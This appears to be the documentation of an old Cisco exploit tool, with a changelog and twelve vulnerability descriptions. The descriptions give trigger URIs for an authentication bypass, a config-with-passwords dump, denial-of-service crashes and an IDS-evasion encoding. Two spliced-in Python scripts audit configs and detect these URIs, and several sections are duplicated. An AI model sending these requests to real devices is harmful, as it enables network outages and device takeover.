well known, or it can be guessed.
In rare cases, an affected device fails to reload, which means an administrator must
physically cycle the power to resume operation.
The HTTP server is not enabled by default except on unconfigured Cisco model 1003,
1004 and 1005 routers.
Once initial access is granted to configure the router, the administrator may set an
enable password, and disable or limit access to the HTTP server by changing the
configuration.
Once the new configuration has been saved, the HTTP server will not be enabled when
the router restarts.

An affected Cisco IOS device that is operating with the HTTP service enabled and is
not protected by having the enable password configured can be forced to halt for up
to two minutes and then reload.
The vulnerability can be exercised repeatedly, possibly creating a Denial of Service
attack, unless the service is disabled, the enable password is set, or the router is
upgraded to a fixed release.
In instances in which a router at a remote location fails to reload, an administrator
must visit the site to enable the device to recover from the defect.


[8] CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability
=========================================================================

Cisco Secure Access Control Server (ACS) for Windows contains two vulnerabilities.
One vulnerability can lead to the execution of arbitrary code on an ACS server,
and the second can lead to an unauthorized disclosure of information.

The affected product is :
Cisco Secure Access Control Server for Windows 2.6.x and ACS 3.0.1.

By connecting to port 2002 and sending a crafted URL, it is possible to, in a less
severe case, kill the CSADMIN module or, in a severe case, to execute arbitrary
user-supplied code.
The functionality of authentication, authorization, and accounting (AAA) is not
affected by termination of the CSADMIN module. This means that users will be able to
authenticate normally.
Only the administration function will be affected.
Port 2002 is used by the CSADMIN
module for remote administration.
By providing a URL containing formatting symbols (for example, %s, %p), it is possible
to execute user-provided code.

By exploiting the format vulnerability, an attacker may execute arbitrary code on the
machine.
This code will be executed in the same context as the CSADMIN process, and that is as
administrator.
Executing arbitrary code will lead to a total compromise of the machine.
By exploiting the directory traversal vulnerability, an attacker can gain unauthorized
access to information in the following file types: html, htm, class, jpg, jpeg or gif.
The main issue may be html files with hardcoded passwords or other sensitive information.


[9] Cisco Catalyst Memory Leak Vulnerability
============================================

A series of failed telnet authentication attempts to the switch can cause the Catalyst
Switch to fail to pass traffic or accept management connections until the system is
rebooted or a power cycle is performed.
All types of telnet authentication are affected, including Kerberized telnet, and
AAA authentication.

Affected systems are :
Catalyst 4000 and 5000 images running version 4.5(2) up to 5.5(4) and 5.5(4a) and
Catalyst 6000 images running version 5.3(1)CSX, up to and including 5.5(4) and 5.5(4a).
The Catalyst 4000 series is installed on the Catalyst 2948G, 2980G, 4003, 4006, and
4912G switches.
The Catalyst 6000 series is installed on the Catalyst 6009, 6006, 6509, 6509-NEB, and
6506 modular chassis switches.

The telnet process fails to release resources upon a failed authentication, or a
successful login of extremely short duration such as a telnet from within an automated
script.
This memory leak eventually results in the failure of the switch to perform any other
processes, such as forwarding traffic or management; a power cycle or reboot is required
for recovery.
The command "show process memory" will indicate increased "Holding" memory after failed
telnet authentication attempts. This value will not decrease over time except when a reboot,
reload, or power cycle occurs. This bug may be triggered over a period of time in the
course of normal operation by legitimate users that occasionally fail authentication.

This vulnerability enables a Denial of Service attack on the Catalyst switch.


[10] Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability
====================================================================

Certain versions of Cisco CatOS ship with an embedded HTTP server.
Switches that run these versions of CatOS are prone to a denial of service, which is due to
a remote buffer overflow condition in the HTTP server.
This issue is reported to affect CatOS versions 5.4 through 7.4 which contain "cv" in the
image name.

Affected systems are :
Cisco CatOS 5.4, 5.5(13a), 5.5, 6.1(2), 6.1, 7.3 and 7.4.

This vulnerability could be exploited by performing a special "GET" request, with a really
big argument; a shellcode could also be used, to get a shell on the remote system or to
execute arbitrary commands.


[11] %u Encoding IDS Bypass Vulnerability (UTF)
===============================================

Intrusion Detection Systems inspect network traffic for suspect or malicious packet formats,
data payloads and traffic patterns.
Intrusion detection systems typically implement obfuscation defense - ensuring that suspect
packets cannot easily be disguised with UTF and/or hex encoding and bypass the Intrusion
Detection systems.

The following products are affected :
Cisco Secure Intrusion Detection System, formerly known as NetRanger, Sensor component and
Cisco Catalyst 6000 Intrusion Detection System Module.

The %u encoding method is a different encoding method that is understood and parsed by the
IIS web server.
This encoding can be applied to other portions of the URL to effectively obfuscate the
attack, preventing detection by many intrusion detection systems available.
Cisco Secure Intrusion Detection System Sensor decoding algorithms have been modified to
detect and parse this unicode form.


This method of obfuscation can allow malicious exploitation to bypass current intrusion
detection technology.


[12] Cisco IOS HTTP Denial of Service Vulnerability
===================================================

The HTTP service facility in the Cisco IOS provides remote management capabilities using
any web browser as client.
It is commonly used to manage remote routers and switches with a simple and user-friendly
Web interface. A flaw in the HTTP server permits an attacker with access to the HTTP service
port to crash the device and force a software reload. The service is enabled by default only
on Cisco 1003, 1004 and 1005 routers.

Virtually all Cisco routers and switches running IOS versions 12.0 through 12.1 inclusive
are vulnerable.
370 | The following is a list of products that are affected if they are running a release of Cisco
371 | IOS software that has the defect :
372 | Cisco routers in the AGS/MGS/CGS/AGS+, IGS, RSM, 800, ubr900, 1000, 2500, 2600, 3000, 3600,
373 | 3800, 4000, 4500, 4700, AS5200, AS5300, AS5800, 6400, 7000, 7200, ubr7200, 7500, and 12000
374 | series.
375 |
376 | By sending an HTTP request with the following URI:
377 |
378 | http://target/anytext?/
379 |
380 | The switch crashes and performs a software reload; network connectivity is disrupted while
381 | this is done.
382 | Sending these HTTP requests repetitively can perform a Denial of Service attack against the
383 | switch and the entire network connected to it.
--------------------------------------------------------------------------------
/doc/Changelog:
--------------------------------------------------------------------------------
1 |
2 | Cisco Global Exploiter [ 13 Vulnerabilities ] - Released: 08/04/2004
3 |
4 | + Fixed a bug in the Cisco IOS HTTP Auth Vulnerability exploit
5 | + Added CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability
6 | + Added Cisco Catalyst Memory Leak Vulnerability
7 | + Added Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability
8 | + Added %u Encoding IDS Bypass Vulnerability (UTF)
9 | + Added Cisco IOS HTTP Denial of Service Vulnerability
10 | + Added complete vulnerabilities documentation
11 |
12 |
13 |
14 | Cisco Global Exploiter [ 8 Vulnerabilities ] - Released: 20/03/2003
15 |
16 | + Cisco 677/678 Telnet Buffer Overflow Vulnerability
17 | + Cisco IOS Router Denial of Service Vulnerability
18 | + Cisco IOS HTTP Auth Vulnerability
19 | + Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
20 | + Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
21 | + Cisco 675 Web Administration Denial of Service Vulnerability
22 | + Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
23 | + Cisco IOS Software HTTP Request Denial of Service Vulnerability
24 |
25 |
--------------------------------------------------------------------------------
/doc/Documentation:
--------------------------------------------------------------------------------
1 |
2 | ##
3 | # Cisco Global Exploiter Documentation
4 | # Vulnerabilities description and exploiting impact
5 | #
6 | # Legal notes :
7 | # The BlackAngels staff refuse all responsibilities
8 | # for an incorrect or illegal use of this document
9 | # or for eventual damages to other systems.
10 | #
11 | # http://www.blackangels.it
12 | ##
13 |
14 |
15 |
16 | [ Table of contents ]
17 |
18 | 1 - Cisco 677/678 Telnet Buffer Overflow Vulnerability
19 | 2 - Cisco IOS Router Denial of Service Vulnerability
20 | 3 - Cisco IOS HTTP Auth Vulnerability &
21 | Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
22 | 4 - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
23 | 5 - Cisco 675 Web Administration Denial of Service Vulnerability
24 | 6 - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
25 | 7 - Cisco IOS Software HTTP Request Denial of Service Vulnerability
26 | 8 - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability
27 | 9 - Cisco Catalyst Memory Leak Vulnerability
28 | 10 - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability
29 | 11 - %u Encoding IDS Bypass Vulnerability (UTF)
30 | 12 - Cisco IOS HTTP Denial of Service Vulnerability
31 |
32 |
33 |
34 | [1] Cisco 677/678 Telnet Buffer Overflow Vulnerability
35 | ======================================================
36 |
37 | This vulnerability is identified in the Cisco Broadband Operating System (CBOS),
38 | the operating system for the Cisco 600 family of routers.
39 | Each vulnerability can cause a Denial of Service by freezing the customer
40 | premises equipment (CPE).
41 | The vulnerability can be exploited remotely.
42 |
43 | All Cisco DSL CPE devices from the 600 family running CBOS software up to
44 | and including the 2.4.4 release are vulnerable.
45 | The complete list of vulnerable hardware models is :
46 | 626, 627, 633, 673, 675, 675e, 676, 677, 677i and 678.
47 |
48 | By sending a large packet to the Telnet port it is possible to freeze the CPE.
49 | It is not necessary to be logged in or to authenticate in any way.
50 | Telnet is enabled by default.
51 |
52 | By repeatedly exploiting these vulnerabilities an attacker can cause a Denial
53 | of Service for an indeterminate period of time.
54 |
55 |
56 | [2] Cisco IOS Router Denial of Service Vulnerability
57 | ====================================================
58 |
59 | A defect in multiple releases of Cisco IOS software will cause a Cisco router
60 | or switch to halt and reload if the IOS HTTP service is enabled and browsing
61 | to "http:///%%" is attempted.
62 | This defect can be exploited to produce a Denial of Service attack.
63 |
64 | The vulnerability affects virtually all mainstream Cisco routers and switches
65 | running Cisco IOS software releases 11.1 through 12.1, inclusive.
66 | The vulnerability can be mitigated by disabling the IOS HTTP server, by using an
67 | access-list on an interface in the path to the router to prevent unauthorized
68 | network connections to the HTTP server, or by applying an access-class option directly
69 | to the HTTP server itself.
70 | The IOS HTTP server is enabled by default only on Cisco 1003, 1004, and 1005
71 | routers that are not configured.
72 | In all other cases, the IOS HTTP server must have been explicitly enabled for
73 | this defect to be exploitable.
74 | Cisco devices that may be running affected releases include :
75 | Cisco routers in the AGS/MGS/CGS/AGS+, IGS, RSM, 800, ubr900, 1000, 2500, 2600,
76 | 3000, 3600, 3800, 4000, 4500, 4700, AS5200, AS5300, AS5800, 6400, 7000, 7200,
77 | ubr7200, 7500, 12000 series, LS1010 ATM switch, Catalyst 6000, 2900XL, 3500XL
78 | LAN switches and Cisco DistributedDirector.
79 |
80 | Any affected Cisco IOS device that is operating with the HTTP server enabled
81 | and is not protected against unauthorized connections can be forced to halt
82 | for a period of up to two minutes and then reload.
83 |
84 | The vulnerability can be exercised repeatedly, possibly creating a Denial
85 | of Service attack, until such time as the HTTP server is disabled, the router
86 | is protected against the attack, or the software on the router is upgraded to
87 | an unaffected release of IOS.
88 | In rare instances when a router at a remote location fails to reload, an
89 | administrator must visit the physical device to recover from the defect.
90 |
91 |
92 | [3] Cisco IOS HTTP Auth Vulnerability & Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
93 | ==================================================================================================================
94 |
95 | When the HTTP server is enabled and local authorization is used, it is possible,
96 | under some circumstances, to bypass the authentication and execute any command
97 | on the device.
98 | In that case, the user will be able to exercise complete control over the device.
99 | All commands will be executed with the highest privilege (level 15).
100 |
101 | All releases of Cisco IOS software from release 11.3 onward are
102 | vulnerable.
103 | Virtually all mainstream Cisco routers and switches running Cisco IOS software
104 | are affected by this vulnerability.
105 | Products that are not running Cisco IOS software are not vulnerable.
106 | Any device running Cisco IOS software release 11.3 or later is vulnerable.
107 | Cisco devices that may be running with affected Cisco IOS software releases
108 | include but are not limited to :
109 | Cisco routers in the AGS/MGS/CGS/AGS+, IGS, RSM, 800, ubr900, 1000, 1400, 1500,
110 | 1600, 1700, 2500, 2600, 3000, 3600, 3800, 4000, 4500, 4700, AS5200, AS5300,
111 | AS5800, 6400, 7000, 7100, 7200, ubr7200, 7500, 12000 series, LS1010 ATM switch,
112 | Catalyst 6000, 5000, 2900XL, 3500XL LAN switches and Cisco Distributed Director.
113 |
114 | By sending a crafted URL it is possible to bypass authentication and execute any
115 | command on the router at level 15 (enable level, the most privileged level).
116 | This will happen only if the device is configured to use a local database for authentication
117 | (usernames and passwords are defined on the device itself).
118 | The same URL will not be effective against every Cisco IOS software release and
119 | hardware combination. However, there are only 84 different combinations to try,
120 | so it would be easy for an attacker to test them all in a short period of time.
121 | The URL in question follows this format :
122 |
123 | http:///level/n/exec/....
124 |
125 | where n is a number between 16 and 99.
126 |
127 | An attacker can exercise complete control over the device.
128 | By exploiting this vulnerability, the attacker can see and change the
129 | configuration of the device.
130 |
131 |
132 | [4] Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
133 | ========================================================================
134 |
135 | Connection attempts that do not use the Secure Shell (SSH) protocol, made to an
136 | enabled SSH service on a Cisco Catalyst 6000, 5000, or 4000 switch, might cause a
137 | "protocol mismatch" error, resulting in a supervisor engine failure.
138 | The supervisor engine failure causes the switch to stop passing traffic and
139 | reboots the switch.
140 |
141 | Only the following images are affected :
142 | cat4000-k9.6-1-1.bin, cat5000-sup3cvk9.6-1-1a.bin, cat5000-sup3k9.6-1-1.bin,
143 | cat5000-supgk9.6-1-1.bin, cat6000-sup2cvk9.6-1-1a.bin, cat6000-sup2k9.6-1-1a.bin,
144 | cat6000-supcvk9.6-1-1a.bin, cat6000-supk9.6-1-1a.bin, cat6000-sup2cvk9.6-1-1b.bin,
145 | cat6000-sup2k9.6-1-1b.bin, cat6000-supcvk9.6-1-1b.bin and cat6000-supk9.6-1-1b.bin.
146 |
147 | Non-SSH connection attempts to the SSH service cause a "protocol mismatch"
148 | error, which causes the switch to reload.
149 | SSH is not enabled by default, and must be configured by the administrator.
150 |
151 | This vulnerability enables a Denial of Service attack on the Catalyst switch.
152 |
153 |
154 | [5] Cisco 675 Web Administration Denial of Service Vulnerability
155 | ================================================================
156 |
157 | Any router in the Cisco 600 family that is configured to allow Web access can
158 | be locked up by sending a specific URL.
159 | Web access is disabled by default, and it is usually enabled in order to
160 | facilitate remote configuration.
161 |
162 | The affected models are :
163 | 627, 633, 673, 675, 675E, 677, 677i and 678.
164 | These models are vulnerable if they run any of the following, or earlier,
165 | CBOS releases:
166 | 2.0.1, 2.1.0, 2.1.0a, 2.2.0, 2.2.1, 2.2.1a, 2.3, 2.3.2, 2.3.5, 2.3.7 and 2.3.8.
167 |
168 | The behavior is caused by inadequate URL parsing in CBOS.
169 | Each URL was expected to terminate with at least a single space character
170 | (ASCII code 32, decimal).
171 | Sending a URL that does not terminate with a space causes CBOS to enter an
172 | infinite loop.
173 | It is necessary to power cycle the router to resume operation.
174 | To exploit this vulnerability, a router must be configured to accept Web connections.
175 | Having a Web access password configured does not provide protection against this
176 | vulnerability.
177 |
178 | By sending a tailored URL to a router, it is possible to cause a Denial of Service.
179 | Every affected router must be powered off and back on in order to restore its normal
180 | functionality.
181 |
182 |
183 | [6] Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
184 | =================================================================
185 |
186 | The Catalyst 3500 XL series switches' web configuration interface lets any user
187 | execute any command on the system without logging in.
188 |
189 | Affected systems are :
190 | Cisco Catalyst 3500 XL series switches and all switches that use similar
191 | software.
192 |
193 | Cisco Catalyst 3500 XL series switches have a web server configuration interface.
194 | This interface lets any anonymous web user execute any command without supplying
195 | any authentication credentials, simply by requesting the "/exec" location from the
196 | web server.
197 | An example follows :
198 |
199 | http://target/exec/show/config/cr
200 |
201 | This URL will show the configuration file, with all user passwords.
202 |
203 |
204 | [7] Cisco IOS Software HTTP Request Denial of Service Vulnerability
205 | ===================================================================
206 |
207 | A defect in multiple releases of Cisco IOS software will cause a Cisco router or
208 | switch to halt and reload if the IOS HTTP service is enabled, browsing to
209 | "http://target/anytext?/" is attempted, and the enable password is supplied
210 | when requested.
211 | This defect can be exploited to produce a Denial of Service attack.
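Section [2] names three mitigations for the IOS HTTP server (disable it, filter it with an interface access-list, or apply an access-class to the server itself), section [3] ties the authentication bypass to local authentication, and the paragraph just above makes the "?/" crash depend on the enable password. The script below audits a running-config excerpt for exactly those preconditions. It is an added example written for this page, not code from the CGE project or from Cisco; the two sample configurations are constructed, the finding strings are this example's own wording, and the commands it looks for (`ip http server`, `ip http access-class`, `ip http authentication`, `enable secret`, `access-list`) are standard IOS configuration lines.

```python
"""Audit an IOS running-config excerpt for the HTTP-server exposure described above.

Added example, not part of the CGE project. Sample configs are constructed; the
finding text is this example's own wording.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample: HTTP server on, local authentication, no ACL, no enable secret.
WEAK_CONFIG = """\
! constructed sample config, not a real device
hostname edge-rtr
ip http server
ip http authentication local
username admin privilege 15 password 0 example
"""

# Constructed sample applying the mitigations named in [2]: an access-class on the
# HTTP server, AAA instead of local authentication, and an enable secret.
HARDENED_CONFIG = """\
! constructed sample config, not a real device
hostname edge-rtr
enable secret 5 <hash-placeholder>
access-list 10 permit 192.0.2.0 0.0.0.255
access-list 10 deny any log
ip http server
ip http access-class 10
ip http authentication aaa
"""


@dataclass
class HttpAudit:
    http_enabled: bool = False
    access_class: Optional[str] = None
    acl_defined: bool = False
    # 'enable' is the IOS default when no 'ip http authentication' line is present.
    authentication: str = "enable"
    enable_password_set: bool = False
    findings: List[str] = field(default_factory=list)


def audit_http_server(config: str) -> HttpAudit:
    """Walk the config line by line and collect findings for an enabled HTTP server."""
    result = HttpAudit()
    acls = set()
    for raw in config.splitlines():
        line = raw.strip()
        if line == "ip http server":
            result.http_enabled = True
        elif line == "no ip http server":
            result.http_enabled = False
        elif (m := re.fullmatch(r"ip http access-class (\S+)", line)):
            result.access_class = m.group(1)
        elif (m := re.fullmatch(r"ip http authentication (\S+)", line)):
            result.authentication = m.group(1)
        elif re.match(r"enable (secret|password) ", line):
            result.enable_password_set = True
        elif (m := re.match(r"access-list (\d+) ", line)):
            acls.add(m.group(1))
        elif (m := re.match(r"ip access-list (?:standard|extended) (\S+)", line)):
            acls.add(m.group(1))

    result.acl_defined = result.access_class is not None and result.access_class in acls
    if not result.http_enabled:
        return result  # nothing exposed: every defect above needs the server enabled
    if result.access_class is None:
        result.findings.append("HTTP server enabled without 'ip http access-class'")
    elif not result.acl_defined:
        result.findings.append(
            f"'ip http access-class {result.access_class}' references an undefined ACL")
    if result.authentication == "local":
        result.findings.append(
            "HTTP uses local authentication (the mode affected by the level/n/exec bypass)")
    if result.authentication == "enable" and not result.enable_password_set:
        result.findings.append(
            "HTTP falls back to the enable password but none is configured")
    return result


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit_http_server(cfg).findings)
```

The audit deliberately reports an access-class that points at an ACL the config never defines, since on IOS such a reference filters nothing; the hardened sample therefore defines the ACL before referencing it and ends it with an explicit logged deny.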
212 |
213 | Cisco devices that may be running with affected IOS software releases include :
214 | Cisco routers in the AGS/MGS/CGS/AGS+, IGS, RSM, 800, ubr900, 1000, 1400, 1500,
215 | 1600, 1700, 2500, 2600, 3000, 3600, 3800, 4000, 4500, 4700, AS5200, AS5300, AS5800,
216 | 6400, 7000, 7200, ubr7200, 7500, 12000 series, LS1010 ATM switch, Catalyst 6000,
217 | 2900XL, LAN switch 1900, 2800, 2900, 3000, and 5000 and Cisco Distributed Director.
218 |
219 | The HTTP server was introduced in IOS release 11.0 to extend router management to
220 | the World Wide Web.
221 | The "?" (question mark) character is defined in the HTML specifications as a
222 | delimiter for CGI arguments.
223 | It is also interpreted by the IOS command-line interface as a request for help.
224 | As of Cisco IOS Software Release 12.0T, the meaning of a question mark when it
225 | appears adjacent to a "/" (slash) character cannot be determined properly by the
226 | URI parser in affected versions of Cisco IOS software.
227 | When a URI containing "?/" is presented to the HTTP service on the router and a
228 | valid enable password is supplied, the router enters an infinite loop.
229 | A watchdog timer expires two minutes later and forces the router to crash and reload.
230 | The router continues to be vulnerable to this defect as long as it is running an
231 | affected IOS software release and the enable password is known.
232 | This vulnerability may only be exploited if the enable password is not set, is
233 | well known, or can be guessed.
234 | In rare cases, an affected device fails to reload, which means an administrator must
235 | physically cycle the power to resume operation.
236 | The HTTP server is not enabled by default except on unconfigured Cisco model 1003,
237 | 1004 and 1005 routers.
238 | Once initial access is granted to configure the router, the administrator may set an
239 | enable password, and disable or limit access to the HTTP server by changing the
240 | configuration.
241 | Once the new configuration has been saved, the HTTP server will not be enabled when
242 | the router restarts.
243 |
244 | An affected Cisco IOS device that is operating with the HTTP service enabled and is
245 | not protected by having the enable password configured can be forced to halt for up
246 | to two minutes and then reload.
247 | The vulnerability can be exercised repeatedly, possibly creating a Denial of Service
248 | attack, unless the service is disabled, the enable password is set, or the router is
249 | upgraded to a fixed release.
250 | In instances in which a router at a remote location fails to reload, an administrator
251 | must visit the site to enable the device to recover from the defect.
252 |
253 |
254 | [8] CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability
255 | =========================================================================
256 |
257 | Cisco Secure Access Control Server (ACS) for Windows contains two vulnerabilities.
258 | One vulnerability can lead to the execution of arbitrary code on an ACS server,
259 | and the second can lead to an unauthorized disclosure of information.
260 |
261 | The affected product is :
262 | Cisco Secure Access Control Server for Windows 2.6.x and ACS 3.0.1.
263 |
264 | By connecting to port 2002 and sending a crafted URL, it is possible to, in the less
265 | severe case, kill the CSADMIN module or, in the severe case, execute arbitrary
266 | user-supplied code.
267 | The functionality of authentication, authorization, and accounting (AAA) is not
268 | affected by termination of the CSADMIN module. This means that users will be able to
269 | authenticate normally.
270 | Only the administration function will be affected. Port 2002 is used by the CSADMIN
271 | module for remote administration.
272 | By providing a URL containing formatting symbols (for example, %s, %p), it is possible
273 | to execute user-provided code.
274 |
275 | By exploiting the format string vulnerability, an attacker may execute arbitrary code on the
276 | machine.
277 | This code will be executed in the same context as the CSADMIN process, that is, as
278 | administrator.
279 | Executing arbitrary code will lead to a total compromise of the machine.
280 | By exploiting the directory traversal vulnerability, an attacker can gain unauthorized
281 | access to information in the following file types: html, htm, class, jpg, jpeg or gif.
282 | The main issue may be html files with hardcoded passwords or other sensitive information.
283 |
284 |
285 | [9] Cisco Catalyst Memory Leak Vulnerability
286 | ============================================
287 |
288 | A series of failed telnet authentication attempts to the switch can cause the Catalyst
289 | switch to fail to pass traffic or accept management connections until the system is
290 | rebooted or a power cycle is performed.
291 | All types of telnet authentication are affected, including Kerberized telnet and
292 | AAA authentication.
293 |
294 | Affected systems are :
295 | Catalyst 4000 and 5000 images running version 4.5(2) up to 5.5(4) and 5.5(4a) and
296 | Catalyst 6000 images running version 5.3(1)CSX, up to and including 5.5(4) and 5.5(4a).
297 | The Catalyst 4000 series software is installed on the Catalyst 2948G, 2980G, 4003, 4006, and
298 | 4912G switches.
299 | The Catalyst 6000 series software is installed on the Catalyst 6009, 6006, 6509, 6509-NEB, and
300 | 6506 modular chassis switches.
301 |
302 | The telnet process fails to release resources upon a failed authentication, or a
303 | successful login of extremely short duration such as a telnet from within an automated
304 | script.
305 | This memory leak eventually results in the failure of the switch to perform any other
306 | processes, such as forwarding traffic or management; a power cycle or reboot is required
307 | for recovery.
308 | The command "show process memory" will indicate increased "Holding" memory after failed
309 | telnet authentication attempts. This value will not decrease over time except when a reboot,
310 | reload, or power cycle occurs. This bug may be triggered over a period of time in the
311 | course of normal operation by legitimate users that occasionally fail authentication.
312 |
313 | This vulnerability enables a Denial of Service attack on the Catalyst switch.
314 |
315 |
316 | [10] Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability
317 | ====================================================================
318 |
319 | Certain versions of Cisco CatOS ship with an embedded HTTP server.
320 | Switches that run these versions of CatOS are prone to a denial of service, which is due to
321 | a remote buffer overflow condition in the HTTP server.
322 | This issue is reported to affect CatOS versions 5.4 through 7.4 which contain "cv" in the
323 | image name.
324 |
325 | Affected systems are :
326 | Cisco CatOS 5.4, 5.5(13a), 5.5, 6.1(2), 6.1, 7.3 and 7.4.
327 |
328 | This vulnerability could be exploited by performing a special "GET" request with an
329 | oversized argument; shellcode could also be supplied to get a shell on the remote system or to
330 | execute arbitrary commands.
331 |
332 |
333 | [11] %u Encoding IDS Bypass Vulnerability (UTF)
334 | ===============================================
335 |
336 | Intrusion Detection Systems inspect network traffic for suspect or malicious packet formats,
337 | data payloads and traffic patterns.
338 | Intrusion detection systems typically implement obfuscation defense - ensuring that suspect
339 | packets cannot easily be disguised with UTF and/or hex encoding and bypass the Intrusion
340 | Detection systems.
341 |
342 | The following products are affected :
343 | Cisco Secure Intrusion Detection System, formerly known as NetRanger, Sensor component and
344 | Cisco Catalyst 6000 Intrusion Detection System Module.
345 |
346 | The %u encoding method is an alternative encoding that is understood and parsed by the
347 | IIS web server.
348 | This encoding can be applied to other portions of the URL to effectively obfuscate the
349 | attack, preventing detection by many of the intrusion detection systems available.
350 | Cisco Secure Intrusion Detection System Sensor decoding algorithms have been modified to
351 | detect and parse this Unicode form.
352 |
353 |
354 | This method of obfuscation can allow malicious exploitation to bypass current intrusion
355 | detection technology.
356 |
357 |
358 | [12] Cisco IOS HTTP Denial of Service Vulnerability
359 | ===================================================
360 |
361 | The HTTP service facility in Cisco IOS provides remote management capabilities using
362 | any web browser as the client.
363 | It is commonly used to manage remote routers and switches through a simple and user-friendly
364 | Web interface. A flaw in the HTTP server permits an attacker with access to the HTTP service
365 | port to crash the device and force a software reload. The service is enabled by default only
366 | on Cisco 1003, 1004 and 1005 routers.
367 |
368 | Virtually all Cisco routers and switches running IOS versions 12.0 through 12.1 inclusive
369 | are vulnerable.
370 | The following is a list of products that are affected if they are running a release of Cisco
371 | IOS software that has the defect :
372 | Cisco routers in the AGS/MGS/CGS/AGS+, IGS, RSM, 800, ubr900, 1000, 2500, 2600, 3000, 3600,
373 | 3800, 4000, 4500, 4700, AS5200, AS5300, AS5800, 6400, 7000, 7200, ubr7200, 7500, and 12000
374 | series.
375 |
376 | By sending an HTTP request with the following URI:
377 |
378 | http://target/anytext?/
379 |
380 | The switch crashes and performs a software reload; network connectivity is disrupted while
381 | this is done.
382 | Sending these HTTP requests repetitively can perform a Denial of Service attack against the
383 | switch and the entire network connected to it.
--------------------------------------------------------------------------------
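Section [11] explains that the IDS fix was to decode the IIS %uXXXX form before matching, and sections [2], [3], [6], [7] and [12] each give the URI shape that triggers the defect. The script below puts the two together as a detector: it normalizes a request target (looping so that double-encoded input also collapses) and matches both the raw and the decoded form against patterns taken from the URIs printed in this documentation. It is an added example for this page, not code from the CGE project or from Cisco; the request lines are constructed, and the signature names are this example's own. The %u form is decoded the way IIS does it, one 16-bit code unit per %uXXXX, so "%u003F" is "?" and "%u002F" is "/".

```python
"""Normalize %uXXXX / %XX encodings and match request targets against the URI
patterns documented above. Added example; not code from the CGE project.
Sample request lines are constructed; signature names are this example's own."""
import re
from typing import List, Optional, Tuple

_PCT_U = re.compile(r"%u([0-9a-fA-F]{4})")   # IIS %uXXXX form, one UTF-16 code unit
_PCT = re.compile(r"%([0-9a-fA-F]{2})")      # standard %XX form


def decode_once(s: str) -> str:
    """One decoding pass: %uXXXX first, then %XX."""
    s = _PCT_U.sub(lambda m: chr(int(m.group(1), 16)), s)
    return _PCT.sub(lambda m: chr(int(m.group(1), 16)), s)


def normalize_uri(uri: str, max_passes: int = 3) -> str:
    """Decode until a fixed point (or max_passes) so layered encodings collapse."""
    for _ in range(max_passes):
        decoded = decode_once(uri)
        if decoded == uri:
            break
        uri = decoded
    return uri


# Patterns taken from the URIs given in sections [2], [3], [6], [7] and [12].
SIGNATURES: List[Tuple[str, re.Pattern]] = [
    ("ios-http-double-percent", re.compile(r"%%")),
    ("ios-http-level-exec-bypass", re.compile(r"/level/(1[6-9]|[2-9][0-9])/exec")),
    ("catalyst-3500xl-exec", re.compile(r"^/exec/")),
    ("ios-http-question-slash", re.compile(r"\?/")),
]


def classify_target(target: str) -> List[str]:
    """Return the signature names matching the raw or the normalized request target.

    Matching the raw form as well keeps a literal '%%' visible even when a
    neighbouring %XX sequence would otherwise be consumed by the decoder."""
    norm = normalize_uri(target)
    return [name for name, pat in SIGNATURES if pat.search(target) or pat.search(norm)]


def parse_request_line(line: str) -> Optional[Tuple[str, str]]:
    """Split 'METHOD target HTTP/x.y' into (method, target); None if malformed."""
    parts = line.split()
    if len(parts) < 2:
        return None
    return parts[0], parts[1]


def scan_requests(lines: List[str]) -> List[Tuple[int, str, str, List[str]]]:
    """Report (line number, raw target, normalized target, hits) for flagged lines."""
    report = []
    for n, line in enumerate(lines, 1):
        parsed = parse_request_line(line)
        if parsed is None:
            continue
        _method, target = parsed
        hits = classify_target(target)
        if hits:
            report.append((n, target, normalize_uri(target), hits))
    return report


# Constructed request lines; the encoded ones are the obfuscated forms [11] describes.
SAMPLE_REQUESTS = [
    "GET / HTTP/1.0",
    "GET /level/16/exec/show/config HTTP/1.0",
    "GET /level/%u0031%u0037/exec/show/config HTTP/1.0",
    "GET /anytext%u003F/ HTTP/1.0",
    "GET /%25%25 HTTP/1.0",
    "GET /exec/show/config/cr HTTP/1.0",
    "GET /cgi-bin/search?q=level HTTP/1.0",
]

if __name__ == "__main__":
    for entry in scan_requests(SAMPLE_REQUESTS):
        print(entry)
```

Of the seven constructed lines, the first and the last are clean; the remaining five are flagged, including the two that only match after %u decoding and the one that only matches after a second pass over %25-encoded input. A sensor that matched raw bytes only would miss those three, which is the gap section [11] describes.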